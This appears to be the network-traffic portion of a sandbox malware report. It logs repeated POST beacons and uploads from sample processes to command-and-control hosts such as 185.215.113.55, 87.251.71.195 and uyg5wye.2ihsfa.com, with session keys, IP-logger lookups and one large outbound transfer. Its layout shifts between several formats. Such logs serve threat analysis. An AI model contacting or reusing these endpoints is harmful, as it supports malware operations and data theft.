| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | 13.9kB | 14 | 13 | POST http://iw.gamegame.info/report7.4.php | 403 |
| 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 598 B | 212 B | 5 | 5 | POST http://87.251.71.195:82/ | |
| 104.21.21.221:80 | http://iw.gamegame.info/report7.4.php | http | SystemNetworkService | 1.2kB | (entry continues below) | | | | |
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        690 B
                                                                                                                                                                                        292 B
                                                                                                                                                                                        7
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        704 B
                                                                                                                                                                                        405 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 31.13.83.36:443
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        6.4kB
                                                                                                                                                                                        271.1kB
                                                                                                                                                                                        118
                                                                                                                                                                                        209

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.218.92.148:80
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=294199&key=5064a966816af6ace47aab1ab46f52fa
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        945 B
                                                                                                                                                                                        10
                                                                                                                                                                                        10

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://uyg5wye.2ihsfa.com/api/?sid=294199&key=5064a966816af6ace47aab1ab46f52fa

HTTP Response: 200

Remote address       URL                                          Protocol   Process               Sent    Received  Packets (sent/recv)  Request  Response
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.2kB   13.8kB    14/13                POST     403
87.251.71.195:82     http://87.251.71.195:82/                     http       arnatic_7.exe         920 B   492 B     12/12                POST     (no response recorded)
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.3kB   13.9kB    15/14                POST     403
208.95.112.1:80      http://ip-api.com/json/?fields=8198          http       SystemNetworkService  890 B   726 B     13/12                GET      200
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.4kB   14.0kB    15/14                POST     403
185.215.113.55:80    http://185.215.113.55/t5BnOoke2/index.php    http       nrbux.exe             606 B   445 B     8/7                  POST     200
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.4kB   13.9kB    14/13                POST     403
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.4kB   13.9kB    14/13                POST     403
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.4kB   13.9kB    15/14                POST     403
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.4kB   13.9kB    14/13                POST     403
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.4kB   14.0kB    15/14                POST     403
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.4kB   13.9kB    14/13                POST     403
185.215.113.55:80    http://185.215.113.55/t5BnOoke2/index.php    http       nrbux.exe             606 B   445 B     8/7                  POST     200
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.4kB   14.0kB    14/13                POST     403
104.21.21.221:80     http://iw.gamegame.info/report7.4.php        http       SystemNetworkService  1.4kB   14.0kB    15/14                POST     403
157.240.201.35:443   https://www.facebook.com/                    tls, http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        6.6kB
                                                                                                                                                                                        271.5kB
                                                                                                                                                                                        122
                                                                                                                                                                                        221

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 88.218.92.148:80
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=294941&key=932c845d57a1c057ea8918c49d9c66f3
                                                                                                                                                                                        http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        921 B
                                                                                                                                                                                        10
                                                                                                                                                                                        10

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://uyg5wye.2ihsfa.com/api/?sid=294941&key=932c845d57a1c057ea8918c49d9c66f3

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.99.66.31:443
                                                                                                                                                                                        https://iplogger.org/18hh57
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        6.5kB
                                                                                                                                                                                        12
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplogger.org/18hh57

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 90.191.200.51:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        814 B
                                                                                                                                                                                        464 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 90.191.200.51:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        679 B
                                                                                                                                                                                        450 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.5kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
  704 B  405 B  6  6
    HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php
    HTTP Response: 200
    HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  http  SystemNetworkService  1.4kB  13.9kB  14  13
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 403
• 87.251.71.195:82  http://87.251.71.195:82/  http  arnatic_7.exe  552 B  172 B  4  4
    HTTP Request: POST http://87.251.71.195:82/
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  http  SystemNetworkService  1.4kB  14.0kB  15  14
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 403
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  http  SystemNetworkService  1.4kB  13.9kB  14  13
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 403
• 87.251.71.195:82  http://87.251.71.195:82/  http  arnatic_7.exe  552 B  172 B  4  4
    HTTP Request: POST http://87.251.71.195:82/
• 87.251.71.195:82  http://87.251.71.195:82/  http  arnatic_7.exe  644 B  252 B  6  6
    HTTP Request: POST http://87.251.71.195:82/
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  http  SystemNetworkService  1.4kB  13.9kB  14  13
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 403
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  http  SystemNetworkService  1.4kB  13.9kB  14  13
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 403
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  http  SystemNetworkService  1.4kB  14.0kB  15  14
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 403
• 185.215.113.55:80  http://185.215.113.55/t5BnOoke2/index.php  http  nrbux.exe  606 B  445 B  8  7
    HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php
    HTTP Response: 200
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  http  SystemNetworkService  1.4kB  14.0kB  15  14
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 403
• 87.251.71.195:82  http://87.251.71.195:82/  http  arnatic_7.exe  920 B  492 B  12  12
    HTTP Request: POST http://87.251.71.195:82/
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  http  SystemNetworkService  1.4kB  13.9kB  15  14
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 403
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  http  SystemNetworkService  1.4kB  14.0kB  16  15
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 403
• 104.21.21.221:80  http://iw.gamegame.info/report7.4.php  http  SystemNetworkService  1.4kB  14.0kB  15  14
    HTTP Request: POST http://iw.gamegame.info/report7.4.php
    HTTP Response: 403
• 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.5kB
                                                                                                                                                                                        14.1kB
                                                                                                                                                                                        17
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        704 B
                                                                                                                                                                                        405 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 208.95.112.1:80
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        936 B
                                                                                                                                                                                        766 B
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://ip-api.com/json/?fields=8198

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
• 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 690 B out / 292 B in | 7 / 7 pkts
  HTTP Request: POST http://87.251.71.195:82/

• 185.215.113.55:80 | http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | 514 B out / 172 B in | 6 / 4 pkts
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php

• 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 598 B out / 212 B in | 5 / 5 pkts
  HTTP Request: POST http://87.251.71.195:82/

• 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 598 B out / 212 B in | 5 / 5 pkts
  HTTP Request: POST http://87.251.71.195:82/

• 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 552 B out / 172 B in | 4 / 4 pkts
  HTTP Request: POST http://87.251.71.195:82/

• 185.215.113.55:80 | http://185.215.113.55/t5BnOoke2/index.php?scr=1 | http | nrbux.exe | 796 B out / 485 B in | 8 / 8 pkts
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php?scr=1

• 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 782 B out / 372 B in | 9 / 9 pkts
  HTTP Request: POST http://87.251.71.195:82/

• 185.215.113.55:80 | http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | 606 B out / 445 B in | 8 / 7 pkts
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php
  HTTP Response: 200

• 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 598 B out / 212 B in | 5 / 5 pkts
  HTTP Request: POST http://87.251.71.195:82/

• 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 552 B out / 172 B in | 4 / 4 pkts
  HTTP Request: POST http://87.251.71.195:82/

• 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 552 B out / 172 B in | 4 / 4 pkts
  HTTP Request: POST http://87.251.71.195:82/

• 87.251.71.195:82 | http://87.251.71.195:82/ | http | arnatic_7.exe | 920 B out / 492 B in | 12 / 12 pkts
  HTTP Request: POST http://87.251.71.195:82/

• 31.13.64.35:443 | https://www.facebook.com/ | tls, http | arnatic_4.exe | 5.6kB out / 226.9kB in | 102 / 179 pkts
  HTTP Request: GET https://www.facebook.com/
  HTTP Response: 200

• 88.218.92.148:80 | http://uyg5wye.2ihsfa.com/api/?sid=297807&key=6f62acb440fd1c860856850e882a0027 | http | arnatic_4.exe | 1.3kB out / 921 B in | 10 / 10 pkts
  HTTP Request: GET http://uyg5wye.2ihsfa.com/api/fbtime
  HTTP Response: 200
  HTTP Request: POST http://uyg5wye.2ihsfa.com/api/?sid=297807&key=6f62acb440fd1c860856850e882a0027
  HTTP Response: 200

• 185.215.113.55:80 | http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | 606 B out / 445 B in | 8 / 7 pkts
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php
  HTTP Response: 200

• 185.215.113.55:80 | http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | 376 B out / 132 B in | 3 / 3 pkts
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php

• 185.215.113.55:80 | http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | 92.8kB out (row truncated)
                                                                                                                                                                                        1.1kB
                                                                                                                                                                                        72
                                                                                                                                                                                        24

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                      • 31.13.83.36:443
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        5.5kB
                                                                                                                                                                                        226.7kB
                                                                                                                                                                                        98
                                                                                                                                                                                        176

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 88.218.92.148:80
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=298539&key=366454b36c6152980d512ef63d850b04
                                                                                                                                                                                        http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        961 B
                                                                                                                                                                                        11
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://uyg5wye.2ihsfa.com/api/?sid=298539&key=366454b36c6152980d512ef63d850b04

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.99.66.31:443
                                                                                                                                                                                        https://iplogger.org/18hh57
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        6.5kB
                                                                                                                                                                                        13
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplogger.org/18hh57

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 84.40.106.91:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        645 B
                                                                                                                                                                                        464 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        874 B
                                                                                                                                                                                        452 B
                                                                                                                                                                                        11
                                                                                                                                                                                        11

                                                                                                                                                                                        HTTP Request

